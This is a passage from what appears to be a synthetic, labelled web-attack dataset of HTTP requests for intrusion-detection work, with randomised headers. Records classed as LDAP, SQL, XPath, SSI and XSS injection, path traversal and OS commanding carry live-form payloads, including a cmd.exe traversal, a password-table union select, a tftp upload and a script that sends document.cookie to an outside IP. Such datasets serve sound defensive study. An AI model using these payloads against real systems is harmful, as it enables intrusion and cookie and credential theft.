Cookie: ihi=24;tr8rorinqsta= aeeee$|Ka;tpol=576034;o9s=i ;eeia9Jlst=25583186
Cookie2: $Version="64"
Date: Sun, 12 Jun 05 13:18:21 UTC
ETag: "VfPdiXxvEuyVogNVe_"
Expect: 100-continue
From: ehreer@1nwhcp.uk
If-Modified-Since: Sun, 01 Jan 06 07:45:29 UTC
If-Unmodified-Since: Tue, 12 Oct 04 18:55:33 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic M0FydHB3bDpscGpzanRlYQ==
Authorization: Digest opaque="entieri"
Range: 542-,61-,33-
Referer: http://9gnieee.net/aey0Ost/utlh/iu1T/eeRrUia.jpg
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: aggey6w6fretUit44ea
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 390x0476
Via: FTP/5.3 68.61.255.222, 9.5 147.168.55.62, 2.5 94.189.130.42
Transfer-Encoding: gzip
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46157
Start - Id: 37163
class: LdapInjection
GET /serElo/7AOci/nHfn7rrass7/uiowats6set/IhcsTbwnhAs.htm?set=Ud&woioeEw2rq3=N6fe%29%28+++%7C++%28inb%3D*%29&n8nc5inha=558&alewoLa=c_9t&RSlocationP5WbJ=%3Evbscriptrhn+cye&cRnsdD=eluxNilnht&INt2dumem=145018 HTTP/1.1
Host: 156.232.19.165
Connection: wai9e
Accept: audio/basic;q=0.0, text/plain;q=0.7, image/gif;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 188.238.110.194
Cookie: odc=s;vc=h9_JiB7B;fcoDe=okthbesatdpijboea;ek13rlTotusinoT=8128768
Cookie2: $Version="45"
Date: Wed, 10 Dec 08 20:51:57 GMT
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Mon, 10 Mar 08 15:19:04 CET
If-Unmodified-Since: Wed, 28 Jul 04 08:14:49 GMT
If-Match: *
If-None-Match: "D3YV@nqrLZimSBOdBtPb"
If-Range: *
Max-Forwards: 40
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic YXBvczpza05p
Range: 183458-,10781-99705
Referer: /rvo1CYo/ht2h.sh
TE: trailers
Trailer: Connection
User-Agent: Mozilla/2.0 (X11; U; Open BSD i586 5.3; ae-ns; rv:0.5.4) Gecko/63790124
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5776x2501
Via: 1.4 www.Eetgej.png, 8.5 100.100.233.3:6541, 0.5 www.lhes1.js
Transfer-Encoding: rsannr; Ttaq=o0shies
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37163
Start - Id: 44212
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.fksIse.biz
Connection: keep-alive
Accept: audio/basic;q=0.5, video/mpeg
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: 2sh-ilE2aa;q=0.1, io-naturrR;q=0.0, 8riqd-ddhca;q=0.9, eaa-jr, wp-gza
Cache-Control: max-stale=22
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Fri, 09 Jul 04 16:16:54 CET
ETag: "fCVpdS-De4XAIYRavLw"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Wed, 10 May 06 16:35:04 UTC
If-Unmodified-Since: Sat, 22 Mar 08 02:52:10 UTC
If-Match: *
If-None-Match: *
If-Range: "1TVFAbk1gVPvL1D"
Max-Forwards: 2
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest realm
Range: 09660-850419
Referer: /dnr0/pTsue.conf
TE: gzip,trailers,chunked;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/8.4 (X11; U; Linux i386 0.0; na-DC; rv:2.6.6) Gecko/79321031
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 953x6132
Via: 6.7 www.9wmetEm.htm:7872, 9.2 205.83.79.42
Transfer-Encoding: identity
Upgrade: eEEr/2.5, y9ejm/8.5, Nwaeld/9.4, tc4/7.0
Warning: 834 www.ecbnesr.png "oqoba9" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44212
Start - Id: 41487
class: SqlInjection
POST /4Tcfse7pn/ucffpeinu/emtMlaoe3toOvmhnaa/eDIOYsxHy8F_jJ/ig/eoeuxiaxn7yonz/0eeegerecR.msf? HTTP/1.0
Content-Length: 177
Content-Language: nahrhE
Content-Encoding: deflate
Content-Location: http://n9eT.gov/rnloSz.zip
Content-MD5: c2loMnRoYXJ0dXFveWVyUw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Jun 09 11:36:58 UTC
Last-Modified: Sat, 14 Mar 09 21:15:08 GMT
Host: 105.117.65.105
Connection: otith
Accept: image/gif, text/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.175.54.165
Cookie: mfrnoee=31778785;poelecl5Bs=nfer9Ld;rldbb=92389;mdeNuIoiwA=wn3o1motzsbswr;orne2iere0dVs=752141
Cookie2: $Version="690"
Date: Mon, 17 Aug 09 03:28:10 GMT
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: rty1n7=s0jaueru
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Thu, 08 Apr 04 16:07:46 CET
If-Unmodified-Since: Wed, 02 Jan 08 14:54:51 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 4856
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: http://www.entsca.uk/8ulahrr/97oeda/pljsepr/k4p3.swf
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/6.0 (X11; U; Unix 4.0; rx-lb; rv:6.4.2) Gecko/36664163
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/1.2 www.ixEEauc.html:378, 2.2 www.qEtble.gif
Transfer-Encoding: gzip
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rmheSS=212&iatTu9d9sdMdboa=echoa@&aeel3epioMa=4tra1H&xrllylruL=5572644&ths=lsa ara&co7uts='     /**/   OR   /**/'' = '&39eRnmwIah8emDl=oO1dK2Ph&-VqiHjn=4eomr

End - Id: 41487
Start - Id: 48748
class: XPathInjection
GET /pl23shibnl/metmjeoEnnntg/oNvrqnxiI5gO@kD6c/14BfkUsAqQArzZk0fa7.dll?icayuavebbam=iuUGJ&nna=oacceptnanu&g6hee=%28i+++++%3C+count%28P1%2Fchild%3A%3Atext%28%29%29++and+++j+++%3C+count%28qi%2Fchild%3A%3Acomment%28%29%29+++++and+k+++++%3C+count%28esrr%2Fchild%3A%3A*%29++++%29&ekbrhlaorzrmoo=wz7%263&crmhE=deo%2B&RJhRu=+a HTTP/1.1
Host: 158.154.239.203
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-cn;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=994
Client-ip: 52.241.218.21
Cookie: rlctoaO=ies7ir7ue;mgoatttttmx7wde=xdi;3pont8sao4s=tasdvbscriptpwP;htpassH7g1RRshutdownd=la
Cookie2: $Version="094"
Date: Fri, 26 Jan 07 22:43:34 CET
ETag: W/"996BwVNCkYJYl76n"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Tue, 06 Jan 04 06:57:16 GMT
If-Unmodified-Since: Thu, 13 Mar 08 16:16:55 GMT
If-Match: "GcUh0zpw_bMk3T5"
If-None-Match: "Gmd.ydn1nlXgHbVs"
If-Range: *
Max-Forwards: 94
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic TWlpaTozZXdF
Authorization: Digest response="3F495F6Cff6AaA2A8BF5EDecF4ef2eF0"
Range: -506333,18704-151605
Referer: /Tftb54c/air9.sh
TE: gzip,gzip;q=0.7,chunked
Trailer: Via
User-Agent: teab1 (tc9QXWPyxy; ovaTjxL; eqZmewkVM)
UA-CPU: MIPS
UA-Disp: 383,7036,16
UA-OS: WinNT
UA-Pixels: 9907x836
Via: HTTP/4.4 www.feeoenhe.shtml, FTP/0.0 www.e6fED.jpg, 5.7 88.118.176.231
Transfer-Encoding: deflate
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 545 www.u3uaajlh.js "deeO" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48748
Start - Id: 47899
class: XSS
GET /toteiiwnel9p/efSedmumminhwucsh/mBZg/mabft/rblatvt.php?7gs48krs7tJ=mC4FkBsV8h7w&ebzdgrdlNcy8s9=d+gopend26t%5B&ndrsSlsr9oemf=pr&9wbetweenG=f-5Rhk&ihBo3msm=asdeiedcio4deh&ffecdAooscus=%3Cxml++src+++%3D%22+++++javascript%3A++%5Balert+++%28%27oo%27%29%3B%5D+++%22++++%3E&cietiS=35837&ee0Hol7ahr=%5Boe%2B+ainoden&wOhiZandqP-=+noesam&yceag=tEo%3D-moe4iN4znodeatmpoae HTTP/1.0
Host: 16.192.97.176
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-6;q=0.8
Accept-Encoding: gzip;q=0.6, gzip;q=0.1
Accept-Language: sa-7huu;q=0.1, potRd-soet, tdish-imecyi;q=0.8, 2etcsot-e;q=0.2
Cache-Control: no-store
Client-ip: 204.130.234.159
Cookie: n8ehldh7pT6ed=vstdinrtafromlogssr'ol7+li7;tih73ren=93|ia7ilibnertCeni;g-B0743S7qq=659;sw=58;eIsleel=632513;oaqrnRRvee=24933
Cookie2: $Version="42"
Date: Fri, 29 Sep 06 20:55:29 UTC
ETag: "mGKHO@G07@ZWa.b4v"
Expect: eiJ8sc
From: rigu@deao.net
If-Modified-Since: Mon, 23 Jul 07 11:48:31 GMT
If-Unmodified-Since: Mon, 22 Dec 08 16:00:00 CET
If-Match: "bvb3LuTjSIw@qID"
If-None-Match: "uFA8eu01lA2N9_OH"
If-Range: "JRA3Z@PzKBKNJHK7pU"
Max-Forwards: 68
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: heh4ty Atut=eajVe0in
Range: 53066-01
Referer: http://rthfy.fr/o0cad/deat/hudpef1/trPb7/auus.swf
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
User-Agent: yThoailhiemtiMmdcC
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 229x467
Via: 6.8 106.134.189.19, 2.8 www.rhbc4.shtml, FTP/0.8 170.95.147.23
Transfer-Encoding: deflate
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 274 128.194.66.58 "9hsdoz" "Fri, 21 Jan 05 16:59:18 CET"
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47899
Start - Id: 40855
class: SSI
GET /eNA7ScjAs/EoabwinntNe9xg_xP/tyonnhsrlAh33Mw8dle/gpg.css?phthgl6YteoEmen=a&D5@rdVctxyO=zeoeincludee5o%29&9muFIO=nTRa%40Q4iCmTQ&rehnfn=t%29e&3Eueg=%3C%21--++++%23odbc++++connect%3D%222onobes%2Ceaj%2Choetm%22++++++++++statement%3D%22select++++*++++from++++pebj%22--%3E&esrs=ciide3iu%24o&xarTqA_QSY@A=eCNYL_&phithoenm8=xvL6DP4&cellvfherlA5=citn+Oi%3DeRgUs5letcn&NwxmeAindahah9=36XIt&sbhInl8ya=92496917&0IvA.VoNC5=cOmolm%5CeA&e81eK=exr2IYJEQ4&aseeete=aon1hhwbexeczt1scripts&eest7=flo HTTP/1.0
Host: www.eerrre0dz.de
Connection: izosEC
Accept: text/*;q=0.6, text/xml;q=0.8
Accept-Charset: windows-1255, iso-8859-8-i
Accept-Encoding: deflate;q=0.9, compress;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 183.188.60.40
Cookie: vcjedwCe=trFN h0oe6dr;eh=8879;cu4cjtj=zh;tgh=da4linW;rkFeqdsrci=wzworh6twnaf
Cookie2: $Version="05"
Date: Thu, 22 Apr 10 03:22:30 UTC
ETag: "tL8-oNOaC9Z8XHTA"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Fri, 16 Jan 09 06:18:28 GMT
If-Match: "rLXOf-sX4kvRuBhhDZ"
If-None-Match: "AMdJCXfSuBH4qsvW2"
If-Range: Sat, 31 Dec 05 17:05:23 CET
Max-Forwards: 47
MIME-Version: 1.5
Pragma: aErmoT='na'
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: -2294,-0518
Referer: http://tfohaubc.be/rbtv.avi
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: rdotCImR http://www.esiirt.uk
UA-CPU: x86
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5993x410
Via: FTP/5.2 132.214.163.210, xaeere/7.6 www.Uzer.shtml, HTTP/3.1 211.85.107.167
Transfer-Encoding: compress
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40855
Start - Id: 38003
class: LdapInjection
GET /tlewrGgtjZyhCnj/yDv@T75fTaccess_logo-e/Aq@Cilnh4NfeHOS/tgeHtHoe/msJO-3D1.jpg?aoV=aSaSfXmiaxq6&yro0Ao=s&3hIR1scriptItW0=sd.9tWJ&aotsdniehhdhfa=38&egwwosooktlN0Xy=iehlsatExpeeTinihw&rIieynPn=qUagset&eaW=El%29%28%26%28objectClass++++%3D++2c*%29&link6@zrN=tto&ftCon=owj2cW-NFtuH&Iseeems=tLqe&XbH4UU=%5BihobjectrftpugcatIlc%24access_login2usr&ememrSiefef=neeltfdjac1hteiobh&Bhexh3yree=aettr&tDhgZplrq=r&ertrehevStPzo=suornb HTTP/1.0
Host: www.d2oc80a1ke.uk
Connection: 0eda5rhn
Accept: text/html, video/mpeg;q=0.9, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, deflate;q=0.2, identity, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 206.83.241.99
Cookie: ltnytfearluli=wmgDOQMni;0aG=rkssr;Qr7Xaenumone=1607;rnN=i|iH)cis
Cookie2: $Version="5"
Date: Wed, 02 Nov 05 19:59:02 GMT
ETag: W/"UDst@tJde@GHR5NuG09g"
Expect: 100-continue
From: inr9@eduqt.it
If-Modified-Since: Thu, 27 Aug 09 22:15:48 CET
If-Unmodified-Since: Sat, 26 Dec 09 23:22:37 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="uskm"
Authorization: Digest response="02dffa1Fb829C3fbED3BBcFED96d7571"
Range: 17672-41
Referer: /Tsea.pdf
TE: trailers
Trailer: Connection
User-Agent: irrmddg0pe (edYXBm)
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: sotboi/1.1 www.nRba8ie4.png, 1.8 www.ouxe.gif, FTP/5.6 www.tLiue.shtml
Transfer-Encoding: compress
Upgrade: sny/6.3, evf0/1.6, an9/0.7, nscrsa/2.9
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38003
Start - Id: 46793
class: XSS
PUT /altsOdlthuc2slbeolv/kgroup bymTbgq/iaueeDoti4ebTtdr/24ZJBvRX.FDD0w6/BhzJTs_vA@LP4@div/ek.al08oGlrvO9/uTV.KcxO2y/ecuwiendreetaje3.tiff? HTTP/1.1
Content-Length: 319
Content-Language: evhu,tkt
Content-Encoding: gzip
Content-Location: http://www.bziarlsr.com/ozst/5mursr/szodtrl.bin
Content-MD5: c2dhdG5ldGhvdGN5ZWV2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Dec 06 14:02:49 UTC
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: www.asablp.it:81
Connection: rsttvh
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: y-i, 15bs-rarlel;q=0.1, qcs3ti-Rsz;q=0.6
Cache-Control: only-if-cached
Client-ip: 12.158.214.61
Cookie: lywtVen=8
Cookie2: $Version="17"
Date: Tue, 20 Sep 05 22:42:15 CET
ETag: W/"w6tFK0pcm3oEf.Rt"
Expect: Ksasyns
From: fnwte@lpuewgs.de
If-Modified-Since: Mon, 22 Nov 04 18:32:15 CET
If-Unmodified-Since: Tue, 14 Nov 06 16:51:08 GMT
If-Match: *
If-None-Match: *
If-Range: "icS7uH.4ofWdvcIWE"
Max-Forwards: 0552
MIME-Version: 5.1
Pragma: rdhe=a
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: NTLM ZXRDdWl1YVJvT3czbXU4aGh3czNvY2doc3J6ZGUweW5hanFlZW1xZWMxRQ==
Range: 15-86
Referer: /e9tnibe/r0meie4n.bin
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.9 (compatible; MSIE 9.5; Linux i386; sIXlaeded)
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 8.7 181.103.148.235:78857, doan/7.5 www.iarnr.jpeg, HTTP/9.4 www.hi48t.tiff
Transfer-Encoding: nBooad; 5mBetre=oph03ye
Upgrade: fbr/7.3
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pHMvBl=14&STHu7bB.O0=lyac0ohaIoeracon&htdfonies52=q&n4attol= cmd9~&9mnrytmo=15369&attcwf=8415&Asdntwda3asb=xtb~o hSe&nvynnad=nfkmTjtLA&oadne1alr=&<script   >[window.open('http://114.109.224.174/ngmela.exe'+document.cookie);]</script    >&LT9B=a13 aeNNev&N37lderobTnbta=n49.fbBEnZ

End - Id: 46793
Start - Id: 37202
class: LdapInjection
GET /tthnh9GkCm-Ag-nGdy/i@_648Hobject1vko.Q/olnmirh4qefngnGhaeog/eC78KDmRwhJGeugA/wyilaalbhe2haa/tebW6jPeayLV/0ohauwh/ntZZNIDaCyrhuBunRn/c8ahtidmlpitoJfli2/awGec628y0xly/eKcb.Xud3orB.shtml?itisooe=1httpsoP&arcmyo0e=5488%29%28%26%28objectClass%3DMx3%29%28%7C%28sn%3D++++uo4%29%28cn%3Deae++J*%29%29&l1etyu7wosst=2491677&h7nLn=r44mlzaair6tNogb9r&tmlyr=40&ineeIr2eIytre=8686176 HTTP/1.0
Host: www.mertilnaQ.it
Connection: keep-alive
Accept: image/jpeg;q=0.8, video/*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: eoRpem-e3rt, s2ore-etlola;q=0.6, hoqrne0-5e0ce;q=0.2, 4actartr-Iyn, 3lN-bn
Cache-Control: max-age=77375
Client-ip: 91.239.79.80
Cookie: Esoclanua=etrrmneOnttqgeia;access_logUvsC4M9y=0h;3an5ltrtnjae=i;cse=54834;bn=3;ggliwe8sifo7=n-cqsc
Cookie2: $Version="0"
Date: Sun, 15 Feb 09 17:18:00 CET
ETag: "PCIxv9iyeJsoKA5p"
Expect: 100-continue
From: eeae@rreIhhhha.biz
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Sat, 04 Jul 09 09:00:24 GMT
If-Match: "UKV5qTybQXfzRvhAF_"
If-None-Match: *
If-Range: *
Max-Forwards: 56
MIME-Version: 2.5
Pragma: shmoapr8=phcsroay
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: Basic ZWZhczpkaTJtaHc=
Range: 605-286224
Referer: /6daaihl/elas.asp
TE: trailers,deflate;q=0.6,deflate;q=0.0
Trailer: Trailer
User-Agent: Tevorttst (7GpcIL-dY; nViJv50P)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0874x8291
Via: 0utfcq/8.1 121.146.79.83:1604, FTP/6.1 www.aQ1Aesht.css:144, FTP/4.7 27.138.69.23:311
Transfer-Encoding: identity
Upgrade: resPct/8.2
Warning: 515 www.RAeg.png "aholxfeqpy" "Wed, 27 Jan 10 22:49:12 GMT"
X-Forwarded-For: 209.47.70.154
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37202
Start - Id: 42404
class: SqlInjection
GET /tHQcDX6lb/.Q2B/MNfAJMVb6uKwy/nGDh5LMw3g30oV3n/tjiKr0cb/lis/gVinputjMFHWupdateacceptARo3/ks9b/Sit7Ofepgiduttir/oJFsd@.shtml?xhh0dd=e-Bm_qgk5LT&aulcoEsmIeeEea=e+htaccestmpposition%7E%2BOeanph-+tj+fI&qo=6563351&AHOUrcpfnph-kU7Ih=f3Nh&ybimpoR=9321&uw6H2e=afcl5+eF9itformarn%2Bbetween+p&gueh6lEnxt=%27union+select++++PASSWORD++from+++DBA_PASSWORD%3B--&2siehAno=oi%2Fsntrosoegmu%5C7+agroup+bye&itheoap5soeem=moxp_cnywhttpou%7Ed%3Bja+eje&lvoifslee=4658167&z8doihEetch=jehmeebotiniofo&iisgj=pot%7Cl+teireoi%29o%2Facty&JbS3Rz=ahurosEacopyaer%5Dtte+w&ngm6bhhrii=%3Daie3e%5Cwinnt%3Acni&fai9rdneeg=accxUqnl HTTP/1.1
Host: www.azovitszdo.it:2
Connection: T5ifhNe3
Accept: video/*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, gzip;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 175.53.83.245
Cookie: G1eechoSTGN=qinserth06otereohincludeel;oresata1coa5s=29;LswBfopen=ecnNeewalhteei6;u6=250653;Fii=528904
Cookie2: $Version="12"
Date: Thu, 21 Feb 08 11:15:02 UTC
ETag: "Ih__Fx4k.oUhLqaWav7"
Expect: fbs8xY
From: 1tXiees@Csgv.st
If-Modified-Since: Sun, 18 Mar 07 10:37:17 GMT
If-Unmodified-Since: Sat, 15 Aug 09 06:47:05 GMT
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: JslOti auhh=xthke
Authorization: Basic ZXNkdTphYjBlYWs=
Range: -4,92807-997,-01613
Referer: http://ofhr.be/me1woRJ/oesur.html
TE: chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/4.2 (Windows; U; WinNT 1.6; ns-el; rv:9.7.9) Gecko/02826389
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: gzip
Upgrade: 2ac/9.1, rwme/4.7
Warning: 593 www.ibdmueus.shtml "Egye9eoeioV6AwrcnL" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42404
Start - Id: 44878
class: PathTransversal
GET /uj9SCYFEKqBnMh/htsol/SUq4@zgM/G4y%u/4UewSl/i3i2wu/ssGBX1dbEmJrKW/t.nTXu1HM@94Dt1T.php?Ty@.Ovarj.kU=783&mrA17dteainn=vysueCsock_streamanlzxt&jmeite=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&w2Dn5yeOdeletet=h&o4mcb=wp-i%28wpreplacef4%3A&deI9p=85770109&rtrDio=da&zdrrb2hk=optke%3BR&ishH4wmmusnm=mmochar+&iqGejiodetti=et%29Hraae3r HTTP/1.0
Host: 96.119.48.230
Connection: close
Accept: application/zip
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-9;q=0.8, macintosh
Accept-Encoding: gzip;q=0.3, identity
Accept-Language: ru-h9y
Cache-Control: no-store
Client-ip: 32.25.74.7
Cookie: ahaa8rarae=ea0rziic;TnxgtUsTeqgazht=feZamtmpseocsDEy;tulMarnhenazri=eatemochaaA)ae
Cookie2: $Version="6"
Date: Tue, 07 Dec 04 19:50:17 CET
ETag: "naMiZq0dj4K0S8gHHUZ"
Expect: ritRee
From: reecos@eeesftcx.gov
If-Modified-Since: Thu, 14 Oct 04 01:47:41 CET
If-Unmodified-Since: Tue, 27 Nov 07 02:02:26 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Jul 09 20:21:11 UTC
Max-Forwards: 21
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: E6i4en cnemics=iaikur
Authorization: NTLM c2hFbXNEbHNvZGEzd2VmbnNldHR5c28zbG9yZWNzaXJkb2VoYW5wcGhtZ2FvbWM=
Range: -41,56231-,-8575
Referer: http://cceboe.be/ee7Heh8t/ambEigy/Yt4at4ah.fgf
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: oRjw23 http://www.hdstgaqt.ch
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 134x0521
Via: 4.9 www.rgah.html, 3.1 63.170.190.107:4, 4.8 www.G6selin.shtml
Transfer-Encoding: mhSsr1
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44878
Start - Id: 44601
class: OsCommanding
GET /eftmtuF4scyt/tA/ee/d./6_5b.M..php?adoSME1=26299&v_HcQHnUdJ=iDy&i-y8IU8GYW=lbooTsomrvnectds&ssoc2oeeteI=3&hre=rtleTr&a4daipo7=47.42.17.198++++%7Ctftp+++-i+++48.27.160.153+++PUT+sam._ HTTP/1.0
Host: 255.251.78.121:80
Connection: inxen
Accept: image/*, audio/x-wav;q=0.8, audio/*
Accept-Charset: x-mac-greek, windows-1252;q=0.5, x-mac-arabic, iso-10646-ucs-2;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: YhKroqav=oi
Client-ip: 97.130.78.86
Cookie: DOUfE1v=oitce;keYMntnrtraf=LJtkoadminIindo;ZVn@K5_0.=se
Cookie2: $Version="67"
Date: Wed, 28 Oct 09 02:53:50 CET
ETag: "YiQ@0NMwQ2OIQMTOOMbh"
Expect: 100-continue
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Thu, 20 Nov 08 03:56:32 GMT
If-Unmodified-Since: Wed, 22 Jun 05 01:49:14 UTC
If-Match: *
If-None-Match: "4@_i-hVBWkkinfyOQhgW"
If-Range: Fri, 03 Mar 06 19:45:04 GMT
Max-Forwards: 5073
MIME-Version: 1.7
Pragma: 5b=muTns
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Digest realm
Range: 8-
